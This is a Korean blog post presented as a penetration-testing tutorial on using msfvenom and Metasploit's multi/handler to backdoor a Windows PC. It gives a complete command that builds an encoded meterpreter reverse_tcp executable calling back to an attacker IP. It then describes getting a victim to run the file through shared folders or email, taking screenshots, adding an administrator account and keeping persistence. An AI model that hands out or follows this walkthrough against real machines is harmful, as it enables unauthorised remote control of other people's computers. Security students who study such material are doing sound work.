본문 바로가기
예전 포스팅 (~2018)

MsfVenom을 사용하여 backdoor 생성하기

by akaranch 2021. 9. 23.

MsfVenom

msfvenom 이란 간단한 명령으로 exploit 코드를 생성한다.

생성한 exploit 코드를 실행파일로 만들거나, 원래 가지고 있던 실행파일에 주입하는 등등 사용할 수 있

세부 옵션을 보는 명령어는 msfvenom -l 이다.

[모의침투 테스트 시나리오]

 

공격자 : msfvenom 생성 -> service postgresql 시작 -> msfconsole 실행 -> multi/handler 사용 -> 대기

피해자 : msfvenom 파일 다운로드 -> 실행

 

msfvenom -a [아키텍처] --platform [운영체제] -p [payload] lhost=[localhost ip] lport=[localport Number] -e [인코더] -i [인코딩 횟수

-f [확장자] -x [파일 주입]  -o [생성경로]

ex) msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=1.0.0.51 lport=4444 -e x64/zuttodekiru -i 3

-f exe -o /root/cr4ft.exe

위와 같은 실행파일이 생성되었다..! msfvenom으로 만든 cr4ft.exe 파일을 공유 파일이나 이메일이나 어떻게든 피해자의 PC에 심어서 실행하게 만들어 줘야 한다.

 

 

[무사히(?) 피해자의 PC에 보냈고 의심 없이 클릭했다는 가정하에 진행]

msfconsole을 실행하기 위해 postgresql 데몬을 시작해주고 msfconsole을 실행해준다.

다용도 익스플로잇 핸들러를 사용한다.

show options를 사용하여 필요한 옵션을 전부 넣어준다.

여기서 rhost가 아닌 lhost만을 이용하는 이유는 예전과 달리 요즘엔 공격자가 직접 피해자의 PC에 들어가는 게 여간 쉽지가 않다.

그러므로 reverse_tcp를 이용하여 피해자가 공격자의 PC로 제 발로 들어오게 만들어야 된다.

msfvenom에 입력한 payload와 똑같이 입력한 후, exploit or run으로 실행시켜주면 대기하게 된다.

피해자 PC에서 cr4ft.exe를 실행시키자마자 reverse_tcp를 통해 공격자에게 meterpreter 세션을 열어준다.

 

getuid로 현재 공격자의 권한을 알아본다.

공격에 성공했다면 추후 권한상승 및 연결유지 작업을 해줘야 한다.

피해자의 PC에 administrators의 그룹에 속한 user ID를 생성하거나, persistence를 이용하여 연결을 유지해 주면 공격은 끝이 난다.

 

추가로 팁을 주자면 일일이 payload를 적기 귀찮을 때, vi 편집기로 미리 페이로드를 만들어놓고 msfconsole 실행 시 불러오는 방식으로도 실행할 수 있다.

이제 meterpreter권한으로 간단하게 피해자의 PC의 screenshot을 찍어보자

공격을 성공했다!

 

참고로 set ExitONsession false을 사용하고 run을 하면 공격자와 피해자 사이에 연결이 끊겨도 공격자는 session을 포기하지 않고 다시 피해자가 켜질 때까지 대기할 수 있다.

저 명령어를 치지 않으면 연결이 끊길 경우 명령어 반복 숙달을 강제적으로 당할 수도 있다.

 

마지막으로 어차피 백신 프로그램에 다 걸리니까 헛짓거리할 생각은 접어두는 게 좋다.

진행하는 모든 모의침투 테스트는 이미 파훼법이 존재하거나 널리 알려진 기법으로 테스트 용도 그 이상도 이하도 아니라는 점을 참고하시라.

'예전 포스팅 (~2018)' 카테고리의 다른 글

FreeNAS 11 설치 및 설정 / 마운팅  (0) 2021.09.23
ELK STACK (ElasticSearch, Logstash, Kibana) 란?  (0) 2021.09.23
Port Scanner [NMAP]  (0) 2021.09.23
Metasploit의 구조  (0) 2021.09.23
MBR과 boot loader  (0) 2021.09.23

댓글